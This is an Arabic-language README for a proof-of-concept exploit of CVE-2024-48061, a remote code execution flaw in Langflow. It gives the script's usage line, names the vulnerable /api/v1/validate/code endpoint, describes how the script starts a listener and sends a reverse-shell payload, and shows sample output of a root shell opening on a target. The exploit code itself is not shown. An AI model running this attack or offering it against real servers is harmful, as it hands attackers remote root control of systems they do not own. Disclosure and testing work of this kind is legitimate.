
CVE-2024-48061 Langflow معرض لتنفيذ التعليمات البرمجية عن بُعد. Poc
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>
يستغل هذا السكريبت نقطة نهاية API ضعيفة في /api/v1/validate/code على خادم الويب المستهدف.
يتحقق أولاً من وجود المسار الضعيف، ثم يبدأ مستمع TCP على عنوان IP ومنفذ المستمع المحددين. بمجرد أن يصبح المستمع جاهزًا، يرسل حمولة مصممة خصيصًا للهدف لاستدعاء شيل عكسي يتصل بالمستمع.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] تم اكتشاف الثغرة في http://192.168.0.2:7860/api/v1/validate/code
[+] الاستماع على 192.168.0.3:4444 ...
[+] إرسال الحمولة إلى http://192.168.0.2:7860/api/v1/validate/code
[+] اتصال من 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] الخروج من الشيل.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] لا يبدو أنها ضعيفة